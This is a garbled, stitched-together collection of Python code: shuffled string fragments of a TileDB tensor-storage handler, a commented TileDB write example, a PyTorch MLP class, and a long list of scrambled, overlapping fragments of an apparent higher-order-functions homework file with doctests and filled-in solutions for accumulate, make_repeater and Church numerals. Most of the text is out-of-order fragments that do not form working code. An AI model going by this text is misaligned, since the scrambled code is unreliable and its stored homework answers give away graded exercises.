sps", "in range(chunk.ndim): axis_offset = axis_offsets[axis] axis_length = chunk.op.input.shape[axis] slcs.append(slice(axis_offset, axis_offset", "BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "+ axis_length)) with tiledb.DenseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp) as arr:", "from ..expressions import datastore from .utils import get_tiledb_ctx def _store_tiledb(ctx,", "with the License. # You may obtain a copy of", "this file except in compliance with the License. 
# You", "0), dtype=chunk.dtype), shape=chunk.shape) def register_data_store_handler(): from ...executor import register register(datastore.TensorTileDBDataStore,", "import tiledb except ImportError: # pragma: no cover tiledb =", "the Apache License, Version 2.0 (the \"License\"); # you may", "sparse to_store = ctx[chunk.op.input.key].spmatrix.tocoo() if to_store.nnz > 0: with tiledb.SparseArray(tiledb_ctx,", "to_store.data else: i, j = to_store.row + axis_offsets[0], to_store.col +", "from .utils import get_tiledb_ctx def _store_tiledb(ctx, chunk): tiledb_ctx = get_tiledb_ctx(chunk.op.tiledb_config)", "[] for axis in range(chunk.ndim): axis_offset = axis_offsets[axis] axis_length =", "key = chunk.op.tiledb_key timestamp = chunk.op.tiledb_timestamp axis_offsets = chunk.op.axis_offsets if", "# limitations under the License. import numpy as np try:" ]
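# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the handler above: the TileDB write
# pattern that _store_tiledb relies on, reduced to a standalone example.
# The uri, schema, and offset below are hypothetical, and the calls assume
# a tiledb-py release where ctx arguments are optional; exact signatures
# vary across versions.
def _demo_dense_write(uri='demo_dense_array'):
    # Create a 1-d dense array of 8 float64 cells.
    dim = tiledb.Dim(name='d0', domain=(0, 7), tile=4, dtype=np.int64)
    schema = tiledb.ArraySchema(domain=tiledb.Domain(dim),
                                attrs=[tiledb.Attr(dtype=np.float64)])
    tiledb.DenseArray.create(uri, schema)

    # Write one "chunk" at its axis offset -- the same slice assignment
    # used in the dense branch of _store_tiledb.
    chunk, offset = np.arange(4, dtype=np.float64), 4
    with tiledb.DenseArray(uri, mode='w') as arr:
        arr[offset:offset + len(chunk)] = chunk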
import torch
import torch.nn as nn
import torch.nn.functional as F

from fastgc.model.penet import PeGradNet
from fastgc.layers.linear import Linear
from fastgc.activation import activation


class MLP(PeGradNet):
    def __init__(self, input_size, hidden_sizes, output_size,
                 act_func='sigmoid', train_alg='batch'):
        """
        Parameters:
        ------------------
        - input_size: integer, the number of features in the input
        - hidden_sizes: a list of integers, a list object containing
          number of units for hidden layers
        - output_size: an integer, the length of output vector
        - act_func: string, name of activation function to use for
          each hidden layer
        - train_alg: string, allowed values are {'batch', 'reweight', 'naive'}
        """
        super(MLP, self).__init__()

        self.input_size = input_size
        layer_sizes = [input_size] + hidden_sizes
        self.linears = nn.ModuleList(
            [Linear(in_size, out_size, bias=True)
             for in_size, out_size in zip(layer_sizes[:-1], layer_sizes[1:])])
        self.output_layer = Linear(hidden_sizes[-1], output_size, bias=True)
        self.act = activation[act_func]
        self.train_alg = train_alg

        # list of layers in the network
        self.layers = [layer for layer in self.linears]
        self.layers.append(self.output_layer)

    def forward(self, x):
        x = x.view(-1, self.input_size)

        out = x
        for layer in self.linears:
            out = self.act(layer(out))
        logits = self.output_layer(out)

        return logits
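# ---------------------------------------------------------------------------
# Hypothetical smoke test for the class above, runnable only where the
# fastgc package is importable; 'sigmoid' is used because it is the
# documented default for act_func, and the sizes are illustrative.
if __name__ == '__main__':
    model = MLP(input_size=784, hidden_sizes=[100], output_size=10,
                act_func='sigmoid', train_alg='batch')
    x = torch.randn(32, 1, 28, 28)     # forward() flattens this to (32, 784)
    assert model(x).shape == (32, 10)  # one logit vector per sample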
[ "-- a function that takes one argument to produce the", "the sum of f(1) + ... + f(n). The implementation", "***\" return lambda x: f(f(x)) three = successor(two) def church_to_int(n):", "3^2 * 4^2 * 5^2 14400 >>> product(3, increment) #", "identity = lambda x: x triple = lambda x: 3", "Church numerals m and n. >>> four = successor(three) >>>", "return lambda f: lambda x: f(n(f)(x)) def one(f): \"\"\"Church numeral", "** n, for Church numerals m and n. >>> church_to_int(pow_church(two,", "Homework 2: Higher Order Functions\"\"\" HW_SOURCE_FILE = 'hw02.py' from operator", ">>> make_repeater(square, 0)(5) # Yes, it makes sense to apply", "x: m(f)(n(f)(x)) def mul_church(m, n): \"\"\"Return the Church numeral for", "2 + 3 + 4 + 5 26 >>> accumulate(add,", "k + 1 return accumulate(add,0,n,f) def product_using_accumulate(n, f): \"\"\"An implementation", "n): \"\"\"Return the Church numeral for m + n, for", "that f(x) = h(g(x)).\"\"\" def f(x): return h(g(x)) return f", "times! 5 \"\"\" \"*** YOUR CODE HERE ***\" def repeater(x):", "120 >>> product(3, square) # 1^2 * 2^2 * 3^2", "n): \"\"\"Return the Church numeral for m * n, for", "* n, for Church numerals m and n. >>> four", "Functions\"\"\" HW_SOURCE_FILE = 'hw02.py' from operator import add, mul, sub", "function that takes one argument to produce the term >>>", "and n. >>> church_to_int(pow_church(two, three)) 8 >>> church_to_int(pow_church(three, two)) 9", "2^2 * 3^2 * 4^2 * 5^2 14400 >>> product(3,", "+ 2 + 3 + 4 + 5 15 >>>", "***\" result, k = base,1 while k <= n: result,", "\"\"\"An implementation of product using accumulate. >>> product_using_accumulate(4, square) 576", "x, y: 2 * (x + y), 2, 3, square)", "square) 576 >>> product_using_accumulate(6, triple) 524880 >>> from construct_check import", "+ f(n). The implementation uses accumulate. >>> summation_using_accumulate(5, square) 55", "* 3^2 36 >>> product(5, square) # 1^2 * 2^2", "YOUR CODE HERE ***\" # result, k = 0, 1", "of the first n terms in a sequence. n --", "25 >>> accumulate(mul, 2, 3, square) # 2 * 1^2", "2)(5) # square(square(5)) 625 >>> make_repeater(square, 4)(5) # square(square(square(square(5)))) 152587890625", "def two(f): \"\"\"Church numeral 2: same as successor(successor(zero))\"\"\" \"*** YOUR", "f: lambda x: m(f)(n(f)(x)) def mul_church(m, n): \"\"\"Return the Church", ">>> check(HW_SOURCE_FILE, 'product_using_accumulate', ... ['Recursion', 'For', 'While']) True \"\"\" \"***", "such that f(x) = h(g(x)).\"\"\" def f(x): return h(g(x)) return", "accumulate(lambda x, y: x + y + 1, 2, 3,", "11 >>> accumulate(add, 11, 3, square) # 11 + 1^2", "def product_using_accumulate(n, f): \"\"\"An implementation of product using accumulate. >>>", "for Church numerals m and n. 
>>> four = successor(three)", "g): \"\"\"Return a function f, such that f(x) = h(g(x)).\"\"\"", ">>> church_to_int(one) 1 >>> church_to_int(two) 2 >>> church_to_int(three) 3 \"\"\"", "successor(successor(zero))\"\"\" \"*** YOUR CODE HERE ***\" return lambda x: f(f(x))", "3, square) 58 >>> accumulate(lambda x, y: (x + y)", "2: Higher Order Functions\"\"\" HW_SOURCE_FILE = 'hw02.py' from operator import", "triple = lambda x: 3 * x increment = lambda", "k <= n: result,k = h(result), k + 1 return", "\"\"\"Return the Church numeral for m * n, for Church", "square) # 1^2 * 2^2 * 3^2 36 >>> product(5,", ">>> add_three(5) 8 >>> make_repeater(triple, 5)(1) # 3 * 3", "4)(5) # square(square(square(square(5)))) 152587890625 >>> make_repeater(square, 0)(5) # Yes, it", "accumulate(mul,1,n,f) def compose1(h, g): \"\"\"Return a function f, such that", "pow_church(m, n): \"\"\"Return the Church numeral m ** n, for", "\"\"\" Homework 2: Higher Order Functions\"\"\" HW_SOURCE_FILE = 'hw02.py' from", "15 >>> accumulate(add, 11, 5, identity) # 11 + 1", "* 3 * 1 243 >>> make_repeater(square, 2)(5) # square(square(5))", "* 3^2 * 4^2 * 5^2 14400 >>> product(3, increment)", "CODE HERE ***\" def repeater(x): result, k = x,1 while", "+ 1)(0) def add_church(m, n): \"\"\"Return the Church numeral for", "m(f)(n(f)(x)) def mul_church(m, n): \"\"\"Return the Church numeral for m", "+ 5 26 >>> accumulate(add, 11, 0, identity) # 11", "\"*** YOUR CODE HERE ***\" return lambda f: lambda x:", "= result + f(k), k + 1 return accumulate(add,0,n,f) def", "f): \"\"\"An implementation of product using accumulate. >>> product_using_accumulate(4, square)", "n: result,k = f(k)*result, k + 1 return result def", "product(3, triple) # 1*3 * 2*3 * 3*3 162 \"\"\"", "5 15 >>> accumulate(add, 11, 5, identity) # 11 +", "the function that computes the nth application of h. >>>", "result * f(k), k + 1 return accumulate(mul,1,n,f) def compose1(h,", "n to a Python integer. >>> church_to_int(zero) 0 >>> church_to_int(one)", "CODE HERE ***\" return n(lambda x: x + 1)(0) def", "(3+1) 24 >>> product(3, triple) # 1*3 * 2*3 *", ">>> four = successor(three) >>> church_to_int(mul_church(two, three)) 6 >>> church_to_int(mul_church(three,", "as successor(zero)\"\"\" \"*** YOUR CODE HERE ***\" return lambda x:", "result, k = 1, 1 # while k <= n:", "lambda f: lambda x: f(n(f)(x)) def one(f): \"\"\"Church numeral 1:", "first n terms in a sequence and base. The terms", "###################### # Required Questions # ###################### def product(n, f): \"\"\"Return", "* 4^2 * 5^2 14400 >>> product(3, increment) # (1+1)", "combined are f(1), f(2), ..., f(n). combiner is a two-argument", "x, y: x + y + 1, 2, 3, square)", "add_three(5) 8 >>> make_repeater(triple, 5)(1) # 3 * 3 *", "+ 1, 2, 3, square) 19 >>> accumulate(lambda x, y:", "The terms to be combined are f(1), f(2), ..., f(n).", "n, for Church numerals m and n. >>> church_to_int(pow_church(two, three))", ">>> accumulate(mul, 2, 3, square) # 2 * 1^2 *", "zero times! 5 \"\"\" \"*** YOUR CODE HERE ***\" def", "CODE HERE ***\" # result, k = 0, 1 #", "result + f(k), k + 1 return accumulate(add,0,n,f) def product_using_accumulate(n,", "f: lambda x: f(n(f)(x)) def one(f): \"\"\"Church numeral 1: same", "def f(x): return h(g(x)) return f def make_repeater(h, n): \"\"\"Return", "using accumulate. >>> product_using_accumulate(4, square) 576 >>> product_using_accumulate(6, triple) 524880", "check(HW_SOURCE_FILE, 'product_using_accumulate', ... 
['Recursion', 'For', 'While']) True \"\"\" \"*** YOUR", "\"\"\"Convert the Church numeral n to a Python integer. >>>", "2 >>> church_to_int(three) 3 \"\"\" \"*** YOUR CODE HERE ***\"", "result, k = base,1 while k <= n: result, k", "def add_church(m, n): \"\"\"Return the Church numeral for m +", "3^2 72 >>> accumulate(lambda x, y: x + y +", "YOUR CODE HERE ***\" return lambda x: f(x) def two(f):", "CODE HERE ***\" return lambda f: m(n(f)) def pow_church(m, n):", "x: f(n(f)(x)) def one(f): \"\"\"Church numeral 1: same as successor(zero)\"\"\"", "f): \"\"\"Return the product of the first n terms in", "to be combined are f(1), f(2), ..., f(n). combiner is", "% 17, 19, 20, square) 16 \"\"\" \"*** YOUR CODE", "k = result * f(k), k + 1 return accumulate(mul,1,n,f)", "***\" def repeater(x): result, k = x,1 while k <=", "make_repeater(increment, 3) >>> add_three(5) 8 >>> make_repeater(triple, 5)(1) # 3", "3 6 >>> product(5, identity) # 1 * 2 *", "Questions # ###################### def product(n, f): \"\"\"Return the product of", "########################## def zero(f): return lambda x: x def successor(n): return", "in a sequence and base. The terms to be combined", "\"\"\"Church numeral 2: same as successor(successor(zero))\"\"\" \"*** YOUR CODE HERE", "YOUR CODE HERE ***\" return lambda x: f(f(x)) three =", "(x + y) % 17, 19, 20, square) 16 \"\"\"", "19 >>> accumulate(lambda x, y: 2 * (x + y),", "church_to_int(mul_church(two, three)) 6 >>> church_to_int(mul_church(three, four)) 12 \"\"\" \"*** YOUR", "application of h. >>> add_three = make_repeater(increment, 3) >>> add_three(5)", "= lambda x: x + 1 ###################### # Required Questions", "n: # result, k = result * f(k), k +", "f(k), k + 1 return accumulate(add,0,n,f) def product_using_accumulate(n, f): \"\"\"An", "58 >>> accumulate(lambda x, y: (x + y) % 17,", "x: f(f(x)) three = successor(two) def church_to_int(n): \"\"\"Convert the Church", "1 # while k <= n: # result, k =", "ban iteration and recursion >>> check(HW_SOURCE_FILE, 'summation_using_accumulate', ... ['Recursion', 'For',", "terms in a sequence and base. The terms to be", "x + y + 1, 2, 3, square) 19 >>>", "'hw02.py' from operator import add, mul, sub square = lambda", "check(HW_SOURCE_FILE, 'summation_using_accumulate', ... ['Recursion', 'For', 'While']) True \"\"\" \"*** YOUR", "# 11 11 >>> accumulate(add, 11, 3, square) # 11", "church_to_int(two) 2 >>> church_to_int(three) 3 \"\"\" \"*** YOUR CODE HERE", "+ y) % 17, 19, 20, square) 16 \"\"\" \"***", "***\" # result, k = 1, 1 # while k", "3, square) # 2 * 1^2 * 2^2 * 3^2", "and recursion >>> check(HW_SOURCE_FILE, 'summation_using_accumulate', ... ['Recursion', 'For', 'While']) True", "... + f(n). The implementation uses accumulate. 
>>> summation_using_accumulate(5, square)", ">>> add_three = make_repeater(increment, 3) >>> add_three(5) 8 >>> make_repeater(triple,", "# ########################## def zero(f): return lambda x: x def successor(n):", "'For', 'While']) True \"\"\" \"*** YOUR CODE HERE ***\" #", "\"*** YOUR CODE HERE ***\" return lambda f: m(n(f)) def", "triple) 45 >>> from construct_check import check >>> # ban", "1 ###################### # Required Questions # ###################### def product(n, f):", "###################### def product(n, f): \"\"\"Return the product of the first", "x: f(x) def two(f): \"\"\"Church numeral 2: same as successor(successor(zero))\"\"\"", "f(x) def two(f): \"\"\"Church numeral 2: same as successor(successor(zero))\"\"\" \"***", "+ 3^2 25 >>> accumulate(mul, 2, 3, square) # 2", "n terms in a sequence and base. The terms to", "mul_church(m, n): \"\"\"Return the Church numeral for m * n,", "CODE HERE ***\" # result, k = 1, 1 #", "k = base,1 while k <= n: result, k =", ">>> accumulate(add, 11, 5, identity) # 11 + 1 +", "# (1+1) * (2+1) * (3+1) 24 >>> product(3, triple)", "1 return result def summation_using_accumulate(n, f): \"\"\"Returns the sum of", "and base. The terms to be combined are f(1), f(2),", "repeater ########################## # Just for fun Questions # ########################## def", "\"\"\" \"*** YOUR CODE HERE ***\" result, k = base,1", "return h(g(x)) return f def make_repeater(h, n): \"\"\"Return the function", "function. >>> accumulate(add, 0, 5, identity) # 0 + 1", "product(n, f): \"\"\"Return the product of the first n terms", "m and n. >>> church_to_int(add_church(two, three)) 5 \"\"\" \"*** YOUR", "lambda x: x * x identity = lambda x: x", "* 3 6 >>> product(5, identity) # 1 * 2", "n. >>> church_to_int(add_church(two, three)) 5 \"\"\" \"*** YOUR CODE HERE", "625 >>> make_repeater(square, 4)(5) # square(square(square(square(5)))) 152587890625 >>> make_repeater(square, 0)(5)", "and n. >>> four = successor(three) >>> church_to_int(mul_church(two, three)) 6", "# Required Questions # ###################### def product(n, f): \"\"\"Return the", "k <= n: result,k = f(k)*result, k + 1 return", "2: same as successor(successor(zero))\"\"\" \"*** YOUR CODE HERE ***\" return", "import add, mul, sub square = lambda x: x *", "return lambda f: lambda x: m(f)(n(f)(x)) def mul_church(m, n): \"\"\"Return", "2, 3, square) 58 >>> accumulate(lambda x, y: (x +", "successor(zero)\"\"\" \"*** YOUR CODE HERE ***\" return lambda x: f(x)", "Church numeral m ** n, for Church numerals m and", "k + 1 return result return repeater ########################## # Just", "19, 20, square) 16 \"\"\" \"*** YOUR CODE HERE ***\"", "1 * 2 * 3 6 >>> product(5, identity) #", ">>> church_to_int(mul_church(three, four)) 12 \"\"\" \"*** YOUR CODE HERE ***\"", ">>> make_repeater(square, 2)(5) # square(square(5)) 625 >>> make_repeater(square, 4)(5) #", "# 3 * 3 * 3 * 3 * 3", "= result * f(k), k + 1 return accumulate(mul,1,n,f) def", "YOUR CODE HERE ***\" # result, k = 1, 1", "1, 1 # while k <= n: # result, k", "result,k = f(k)*result, k + 1 return result def accumulate(combiner,", "5 26 >>> accumulate(add, 11, 0, identity) # 11 11", "k <= n: # result, k = result * f(k),", "to a Python integer. 
>>> church_to_int(zero) 0 >>> church_to_int(one) 1", "Required Questions # ###################### def product(n, f): \"\"\"Return the product", "integer f -- a function that takes one argument to", "HERE ***\" # result, k = 0, 1 # while", "1)(0) def add_church(m, n): \"\"\"Return the Church numeral for m", ">>> product(3, identity) # 1 * 2 * 3 6", "Python integer. >>> church_to_int(zero) 0 >>> church_to_int(one) 1 >>> church_to_int(two)", "make_repeater(square, 2)(5) # square(square(5)) 625 >>> make_repeater(square, 4)(5) # square(square(square(square(5))))", "= 0, 1 # while k <= n: # result,", "add_church(m, n): \"\"\"Return the Church numeral for m + n,", "* 3*3 162 \"\"\" \"*** YOUR CODE HERE ***\" result,k", "\"\"\"Return the result of combining the first n terms in", "+ y + 1, 2, 3, square) 19 >>> accumulate(lambda", "sequence. n -- a positive integer f -- a function", "k = 1, 1 # while k <= n: #", "<= n: result,k = h(result), k + 1 return result", "product_using_accumulate(n, f): \"\"\"An implementation of product using accumulate. >>> product_using_accumulate(4,", "return result return repeater ########################## # Just for fun Questions", "def compose1(h, g): \"\"\"Return a function f, such that f(x)", "accumulate(add, 11, 5, identity) # 11 + 1 + 2", "make_repeater(triple, 5)(1) # 3 * 3 * 3 * 3", "2 * 1^2 * 2^2 * 3^2 72 >>> accumulate(lambda", "3 + 4 + 5 26 >>> accumulate(add, 11, 0,", "0, 1 # while k <= n: # result, k", "<= n: # result, k = result * f(k), k", "f(f(x)) three = successor(two) def church_to_int(n): \"\"\"Convert the Church numeral", "3 + 4 + 5 15 >>> accumulate(add, 11, 5,", "x, y: (x + y) % 17, 19, 20, square)", "2^2 * 3^2 72 >>> accumulate(lambda x, y: x +", ">>> summation_using_accumulate(5, square) 55 >>> summation_using_accumulate(5, triple) 45 >>> from", "***\" return lambda x: f(x) def two(f): \"\"\"Church numeral 2:", "26 >>> accumulate(add, 11, 0, identity) # 11 11 >>>", "lambda f: lambda x: m(f)(n(f)(x)) def mul_church(m, n): \"\"\"Return the", "1^2 * 2^2 * 3^2 36 >>> product(5, square) #", "YOUR CODE HERE ***\" result,k = 1,1 while k <=", "the first n terms in a sequence. n -- a", "11 + 1^2 + 2^2 + 3^2 25 >>> accumulate(mul,", "3^2 36 >>> product(5, square) # 1^2 * 2^2 *", ">>> church_to_int(pow_church(three, two)) 9 \"\"\" \"*** YOUR CODE HERE ***\"", "church_to_int(pow_church(three, two)) 9 \"\"\" \"*** YOUR CODE HERE ***\" return", "base, n, f): \"\"\"Return the result of combining the first", "recursion >>> check(HW_SOURCE_FILE, 'summation_using_accumulate', ... ['Recursion', 'For', 'While']) True \"\"\"", "church_to_int(add_church(two, three)) 5 \"\"\" \"*** YOUR CODE HERE ***\" return", "0 >>> church_to_int(one) 1 >>> church_to_int(two) 2 >>> church_to_int(three) 3", "2 + 3 + 4 + 5 15 >>> accumulate(add,", "accumulate(lambda x, y: (x + y) % 17, 19, 20,", "lambda x: x + 1 ###################### # Required Questions #", "* 1 243 >>> make_repeater(square, 2)(5) # square(square(5)) 625 >>>", "0, 5, identity) # 0 + 1 + 2 +", "for Church numerals m and n. >>> church_to_int(add_church(two, three)) 5", "576 >>> product_using_accumulate(6, triple) 524880 >>> from construct_check import check", "n. 
>>> four = successor(three) >>> church_to_int(mul_church(two, three)) 6 >>>", "h(g(x)).\"\"\" def f(x): return h(g(x)) return f def make_repeater(h, n):", ">>> product(3, increment) # (1+1) * (2+1) * (3+1) 24", "return f def make_repeater(h, n): \"\"\"Return the function that computes", ">>> accumulate(add, 11, 0, identity) # 11 11 >>> accumulate(add,", "* 3^2 72 >>> accumulate(lambda x, y: x + y", "# 1*3 * 2*3 * 3*3 162 \"\"\" \"*** YOUR", "Church numerals m and n. >>> church_to_int(add_church(two, three)) 5 \"\"\"", "1^2 * 2^2 * 3^2 * 4^2 * 5^2 14400", "<= n: result,k = f(k)*result, k + 1 return result", "successor(two) def church_to_int(n): \"\"\"Convert the Church numeral n to a", "base,1 while k <= n: result, k = combiner(result,f(k)), k", "term >>> product(3, identity) # 1 * 2 * 3", "+ 2^2 + 3^2 25 >>> accumulate(mul, 2, 3, square)", ">>> product_using_accumulate(6, triple) 524880 >>> from construct_check import check >>>", "return lambda f: m(n(f)) def pow_church(m, n): \"\"\"Return the Church", "3^2 25 >>> accumulate(mul, 2, 3, square) # 2 *", "True \"\"\" \"*** YOUR CODE HERE ***\" # result, k", "def successor(n): return lambda f: lambda x: f(n(f)(x)) def one(f):", "11 + 1 + 2 + 3 + 4 +", "n, for Church numerals m and n. >>> church_to_int(add_church(two, three))", "HERE ***\" return lambda x: f(x) def two(f): \"\"\"Church numeral", "numerals m and n. >>> four = successor(three) >>> church_to_int(mul_church(two,", "k <= n: # result, k = result + f(k),", "function that computes the nth application of h. >>> add_three", "and recursion >>> check(HW_SOURCE_FILE, 'product_using_accumulate', ... ['Recursion', 'For', 'While']) True", "3 * 3 * 3 * 1 243 >>> make_repeater(square,", "return lambda x: f(x) def two(f): \"\"\"Church numeral 2: same", "= f(k)*result, k + 1 return result def accumulate(combiner, base,", "m(n(f)) def pow_church(m, n): \"\"\"Return the Church numeral m **", "def one(f): \"\"\"Church numeral 1: same as successor(zero)\"\"\" \"*** YOUR", "the term >>> product(3, identity) # 1 * 2 *", "36 >>> product(5, square) # 1^2 * 2^2 * 3^2", "n, f): \"\"\"Return the result of combining the first n", "11, 3, square) # 11 + 1^2 + 2^2 +", "m and n. >>> church_to_int(pow_church(two, three)) 8 >>> church_to_int(pow_church(three, two))", "a sequence. n -- a positive integer f -- a", "k = combiner(result,f(k)), k + 1 return result def summation_using_accumulate(n,", "# 11 + 1 + 2 + 3 + 4", ">>> # ban iteration and recursion >>> check(HW_SOURCE_FILE, 'summation_using_accumulate', ...", "lambda f: m(n(f)) def pow_church(m, n): \"\"\"Return the Church numeral", "one argument to produce the term >>> product(3, identity) #", "55 >>> summation_using_accumulate(5, triple) 45 >>> from construct_check import check", "lambda x: x def successor(n): return lambda f: lambda x:", "n: result, k = combiner(result,f(k)), k + 1 return result", "\"\"\" \"*** YOUR CODE HERE ***\" result,k = 1,1 while", "YOUR CODE HERE ***\" def repeater(x): result, k = x,1", "# result, k = 1, 1 # while k <=", "x: x + 1)(0) def add_church(m, n): \"\"\"Return the Church", "1 >>> church_to_int(two) 2 >>> church_to_int(three) 3 \"\"\" \"*** YOUR", "as successor(successor(zero))\"\"\" \"*** YOUR CODE HERE ***\" return lambda x:", "recursion >>> check(HW_SOURCE_FILE, 'product_using_accumulate', ... 
['Recursion', 'For', 'While']) True \"\"\"", "church_to_int(one) 1 >>> church_to_int(two) 2 >>> church_to_int(three) 3 \"\"\" \"***", "Church numeral for m * n, for Church numerals m", "return lambda x: x def successor(n): return lambda f: lambda", "f, such that f(x) = h(g(x)).\"\"\" def f(x): return h(g(x))", "16 \"\"\" \"*** YOUR CODE HERE ***\" result, k =", "* 3 * 3 * 3 * 1 243 >>>", "-- a positive integer f -- a function that takes", "the first n terms in a sequence and base. The", "HERE ***\" # result, k = 1, 1 # while", "h(g(x)) return f def make_repeater(h, n): \"\"\"Return the function that", "return n(lambda x: x + 1)(0) def add_church(m, n): \"\"\"Return", "\"\"\" \"*** YOUR CODE HERE ***\" return n(lambda x: x", "ban iteration and recursion >>> check(HW_SOURCE_FILE, 'product_using_accumulate', ... ['Recursion', 'For',", "Questions # ########################## def zero(f): return lambda x: x def", "two(f): \"\"\"Church numeral 2: same as successor(successor(zero))\"\"\" \"*** YOUR CODE", "increment) # (1+1) * (2+1) * (3+1) 24 >>> product(3,", "numeral for m + n, for Church numerals m and", "while k <= n: # result, k = result +", "***\" return lambda f: m(n(f)) def pow_church(m, n): \"\"\"Return the", "takes one argument to produce the term >>> product(3, identity)", "\"\"\"Return the product of the first n terms in a", "= 1, 1 # while k <= n: # result,", "5, identity) # 11 + 1 + 2 + 3", "f): \"\"\"Return the result of combining the first n terms", "a function f, such that f(x) = h(g(x)).\"\"\" def f(x):", "= combiner(result,f(k)), k + 1 return result def summation_using_accumulate(n, f):", "CODE HERE ***\" return lambda x: f(f(x)) three = successor(two)", "x increment = lambda x: x + 1 ###################### #", ">>> make_repeater(square, 4)(5) # square(square(square(square(5)))) 152587890625 >>> make_repeater(square, 0)(5) #", "numeral 2: same as successor(successor(zero))\"\"\" \"*** YOUR CODE HERE ***\"", "numerals m and n. >>> church_to_int(pow_church(two, three)) 8 >>> church_to_int(pow_church(three,", "nth application of h. >>> add_three = make_repeater(increment, 3) >>>", "first n terms in a sequence. n -- a positive", "* 5 120 >>> product(3, square) # 1^2 * 2^2", "identity) # 1 * 2 * 3 6 >>> product(5,", "11 11 >>> accumulate(add, 11, 3, square) # 11 +", "= x,1 while k <= n: result,k = h(result), k", "5 120 >>> product(3, square) # 1^2 * 2^2 *", "5, identity) # 0 + 1 + 2 + 3", "return accumulate(mul,1,n,f) def compose1(h, g): \"\"\"Return a function f, such", "n(lambda x: x + 1)(0) def add_church(m, n): \"\"\"Return the", "\"\"\" \"*** YOUR CODE HERE ***\" # result, k =", ">>> church_to_int(two) 2 >>> church_to_int(three) 3 \"\"\" \"*** YOUR CODE", "+ 1 return result def summation_using_accumulate(n, f): \"\"\"Returns the sum", "11, 0, identity) # 11 11 >>> accumulate(add, 11, 3,", "f(n(f)(x)) def one(f): \"\"\"Church numeral 1: same as successor(zero)\"\"\" \"***", "1^2 * 2^2 * 3^2 72 >>> accumulate(lambda x, y:", "+ n, for Church numerals m and n. >>> church_to_int(add_church(two,", "4 + 5 15 >>> accumulate(add, 11, 5, identity) #", "make_repeater(h, n): \"\"\"Return the function that computes the nth application", "church_to_int(mul_church(three, four)) 12 \"\"\" \"*** YOUR CODE HERE ***\" return", "lambda x: x triple = lambda x: 3 * x", "f -- a function that takes one argument to produce", "14400 >>> product(3, increment) # (1+1) * (2+1) * (3+1)", "combining the first n terms in a sequence and base.", "a sequence and base. 
The terms to be combined are", "f def make_repeater(h, n): \"\"\"Return the function that computes the", "product(3, square) # 1^2 * 2^2 * 3^2 36 >>>", ">>> make_repeater(triple, 5)(1) # 3 * 3 * 3 *", "45 >>> from construct_check import check >>> # ban iteration", "2^2 * 3^2 36 >>> product(5, square) # 1^2 *", ">>> from construct_check import check >>> # ban iteration and", "\"*** YOUR CODE HERE ***\" # result, k = 1,", "2 * 3 * 4 * 5 120 >>> product(3,", "successor(three) >>> church_to_int(mul_church(two, three)) 6 >>> church_to_int(mul_church(three, four)) 12 \"\"\"", "k + 1 return accumulate(mul,1,n,f) def compose1(h, g): \"\"\"Return a", "lambda x: f(n(f)(x)) def one(f): \"\"\"Church numeral 1: same as", "\"*** YOUR CODE HERE ***\" result,k = 1,1 while k", "* (2+1) * (3+1) 24 >>> product(3, triple) # 1*3", ">>> # ban iteration and recursion >>> check(HW_SOURCE_FILE, 'product_using_accumulate', ...", "numerals m and n. >>> church_to_int(add_church(two, three)) 5 \"\"\" \"***", "from construct_check import check >>> # ban iteration and recursion", "* f(k), k + 1 return accumulate(mul,1,n,f) def compose1(h, g):", "= lambda x: 3 * x increment = lambda x:", "3 * 3 * 3 * 3 * 3 *", "a two-argument commutative, associative function. >>> accumulate(add, 0, 5, identity)", "summation_using_accumulate(n, f): \"\"\"Returns the sum of f(1) + ... +", "numeral 1: same as successor(zero)\"\"\" \"*** YOUR CODE HERE ***\"", "2^2 + 3^2 25 >>> accumulate(mul, 2, 3, square) #", "result def summation_using_accumulate(n, f): \"\"\"Returns the sum of f(1) +", "result return repeater ########################## # Just for fun Questions #", "\"*** YOUR CODE HERE ***\" # result, k = 0,", "result def accumulate(combiner, base, n, f): \"\"\"Return the result of", "524880 >>> from construct_check import check >>> # ban iteration", "repeater(x): result, k = x,1 while k <= n: result,k", "summation_using_accumulate(5, square) 55 >>> summation_using_accumulate(5, triple) 45 >>> from construct_check", "\"*** YOUR CODE HERE ***\" result, k = base,1 while", "that computes the nth application of h. >>> add_three =", "# square(square(5)) 625 >>> make_repeater(square, 4)(5) # square(square(square(square(5)))) 152587890625 >>>", "12 \"\"\" \"*** YOUR CODE HERE ***\" return lambda f:", "* 3 * 4 * 5 120 >>> product(3, square)", "mul, sub square = lambda x: x * x identity", "CODE HERE ***\" result,k = 1,1 while k <= n:", "* 2^2 * 3^2 * 4^2 * 5^2 14400 >>>", "x * x identity = lambda x: x triple =", "HERE ***\" result, k = base,1 while k <= n:", "<= n: result, k = combiner(result,f(k)), k + 1 return", "f(n). The implementation uses accumulate. >>> summation_using_accumulate(5, square) 55 >>>", "4 * 5 120 >>> product(3, square) # 1^2 *", "iteration and recursion >>> check(HW_SOURCE_FILE, 'summation_using_accumulate', ... ['Recursion', 'For', 'While'])", "combiner is a two-argument commutative, associative function. 
>>> accumulate(add, 0,", "lambda x: 3 * x increment = lambda x: x", "n: # result, k = result + f(k), k +", "lambda x: f(f(x)) three = successor(two) def church_to_int(n): \"\"\"Convert the", "product(5, square) # 1^2 * 2^2 * 3^2 * 4^2", ">>> accumulate(add, 11, 3, square) # 11 + 1^2 +", "8 >>> make_repeater(triple, 5)(1) # 3 * 3 * 3", "lambda x: m(f)(n(f)(x)) def mul_church(m, n): \"\"\"Return the Church numeral", "= 1,1 while k <= n: result,k = f(k)*result, k", "152587890625 >>> make_repeater(square, 0)(5) # Yes, it makes sense to", "\"*** YOUR CODE HERE ***\" return lambda x: f(f(x)) three", "2, 3, square) # 2 * 1^2 * 2^2 *", "+ 1 return accumulate(add,0,n,f) def product_using_accumulate(n, f): \"\"\"An implementation of", "+ 1 + 2 + 3 + 4 + 5", "f(x): return h(g(x)) return f def make_repeater(h, n): \"\"\"Return the", ">>> accumulate(lambda x, y: x + y + 1, 2,", "a function that takes one argument to produce the term", "0)(5) # Yes, it makes sense to apply the function", "produce the term >>> product(3, identity) # 1 * 2", "square) # 2 * 1^2 * 2^2 * 3^2 72", "summation_using_accumulate(5, triple) 45 >>> from construct_check import check >>> #", "\"\"\" \"*** YOUR CODE HERE ***\" return lambda f: lambda", "make_repeater(square, 4)(5) # square(square(square(square(5)))) 152587890625 >>> make_repeater(square, 0)(5) 